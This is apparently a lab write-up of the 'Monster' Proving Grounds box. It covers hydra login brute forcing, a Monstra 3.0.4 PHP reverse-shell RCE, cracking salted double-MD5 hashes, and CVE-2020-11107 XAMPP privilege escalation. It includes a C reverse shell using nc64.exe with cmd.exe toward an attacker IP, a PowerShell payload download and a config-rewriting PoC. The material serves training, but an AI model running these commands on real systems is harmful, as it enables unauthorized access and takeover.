Monster - Proving Grounds Practice
Enumeration
Nmap
The initial nmap scan revealed that the SMB, MySQL and HTTP ports were open.
Website
The initial website was a static site.
So I ran a directory brute force and found the /blog endpoint.
The website was redirecting us to the monster.pg domain.
So I added it to the /etc/hosts file.
The blog website was Monstra 3.0.4.
Exploitation
Brute Force
At first I tried default credentials but none of them worked. Then I used cewl to create a wordlist.
cewl http://monster.pg/ > passlist
Then I ran a hydra brute force and found the password for the admin user.
hydra -l admin -P passlist monster.pg http-post-form '/blog/admin/:login=^USER^&password=^PASS^&login_submit=Log+In:F=Wrong' -I -f -V
Monstra 3.0.4 RCE
Later I found this GitHub issue (https://github.com/monstra-cms/monstra/issues/470), which explains how to abuse this version to get a reverse shell.
- Log into the panel.
- Go to “/monstra-3.0.4/admin/index.php?id=themes&action=edit_template&filename=blog”
- Click edit Blog
- Insert the payload easy-simple-php-webshell.php
- Reload the page and review the code execution
So I used ivan-sincek/php-reverse-shell to create a reverse shell and updated the IP and port values.
Later, I visited the created blog page at /blog/blog and got a reverse shell.
Privilege Escalation
users.table.xml decryption
At first I found the users.table.xml file located at C:\xampp\htdocs\blog\storage.
Then I formatted the XML output using an online formatter (https://jsonformatter.org/xml-formatter).
We already knew the admin password, but there was another user. While checking I found this post (https://simpleinfoseccom.wordpress.com/2018/05/27/monstra-cms-3-0-4-unauthenticated-user-credential-exposure/)
which explains how passwords are stored in the users.table.xml file.
To understand it even more I checked the Security.php file under C:\xampp\htdocs\blog\engine and found the encryption code.
/**
* Encrypt password
*
* <code>
* $encrypt_password = Security::encryptPassword('password');
* </code>
*
* @param string $password Password to encrypt
*/
public static function encryptPassword($password)
{
return md5(md5(trim($password) . MONSTRA_PASSWORD_SALT));
}
It was simply concatenating the password and the salt, then applying MD5 twice. So I checked the defines.php file under C:\xampp\htdocs\blog\boot, which showed the salt value.
/**
* Set password salt
*/
define('MONSTRA_PASSWORD_SALT', 'YOUR_SALT_HERE');
So it was simply YOUR_SALT_HERE. I could now crack the passwords. I tried to crack the hash with rockyou.txt using hashcat mode 2630 and it worked.
However, it was not useful, because I already had a shell as mike and it was mike's password.
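The hashing scheme above ported to Python, with a per-user salted PBKDF2 variant beside it to show what the double-MD5 scheme is missing. This is an added example, not code from the Monstra project or from the original writeup; the users.table.xml element names and the sample entries are constructed assumptions.

```python
import hashlib
import hmac
import os
import xml.etree.ElementTree as ET

# Default salt from Monstra's boot/defines.php, as quoted on the page.
MONSTRA_PASSWORD_SALT = "YOUR_SALT_HERE"
PHP_TRIM_CHARS = " \t\n\r\0\x0b"  # the character set PHP's trim() strips by default


def monstra_encrypt_password(password, salt=MONSTRA_PASSWORD_SALT):
    """Port of Security::encryptPassword(): md5(md5(trim($password) . SALT))."""
    inner = hashlib.md5((password.strip(PHP_TRIM_CHARS) + salt).encode()).hexdigest()
    return hashlib.md5(inner.encode()).hexdigest()


def load_users(xml_text):
    """Map login -> stored password hash from a users.table.xml-shaped document."""
    root = ET.fromstring(xml_text)
    return {u.findtext("login"): u.findtext("password") for u in root.findall("user")}


def monstra_verify(stored_hash, candidate):
    """Check one candidate against a stored Monstra hash in constant time."""
    return hmac.compare_digest(stored_hash, monstra_encrypt_password(candidate))


# Hardened alternative (not part of Monstra): random per-user salt plus a slow KDF,
# so equal passwords get different hashes and each guess costs real work.
def pbkdf2_hash(password, salt=None, iterations=600_000):
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(iterations, salt.hex(), dk.hex())


def pbkdf2_verify(stored, candidate):
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample shaped like storage/users.table.xml (element names are an assumption).
# Both users share a password to show the effect of a single site-wide salt.
SAMPLE_USERS_TABLE = """<root>
  <user><id>1</id><login>admin</login><password>{0}</password><role>admin</role></user>
  <user><id>2</id><login>mike</login><password>{0}</password><role>editor</role></user>
</root>""".format(monstra_encrypt_password("Password1"))
```

With the site-wide salt every account that shares a password also shares a hash, so one cracked hash covers all of them; the PBKDF2 variant breaks that link.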
CVE-2020-11107
An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16, and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-control.ini for all users (including admins) to enable arbitrary command execution.
So later, I executed WinPEAS.exe and found I had write privileges over C:\xampp. Some research revealed there was a CVE assigned to this.
I found this repo (Mohnad-AL-saif/Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation), which explains the exploitation in detail.
At first I checked the version using type C:\xampp\properties.ini.
It was vulnerable. So I created a malicious executable in C with i686-w64-mingw32-gcc, after transferring the nc64.exe file.
#include <stdlib.h>

/* Runs the transferred nc64.exe and connects back to the listener on 192.168.45.216:445 with cmd.exe attached. */
int main(void)
{
    system("C:\\ProgramData\\nc64.exe 192.168.45.216 445 -e cmd.exe");
    return 0;
}
i686-w64-mingw32-gcc exp.c -l ws2_32 -o exp.exe
Then I created a temp folder using mkdir C:\temp and transferred my malicious file there using powershell iwr http://192.168.45.216/exp.exe -outfile C:\temp\msf.exe.
Then I created a PowerShell script to exploit this.
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
# Take the value after "=" on the third line of the ini (the .exe entry the CVE description refers to)
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
# Swap that value for the planted executable and write the file back
(Get-Content $file) -replace $find, $replace | Set-Content $file
Later I simply executed the ps1 payload using powershell -ExecutionPolicy Bypass -File exp.ps1 and started waiting.
After some time, I got an administrator shell.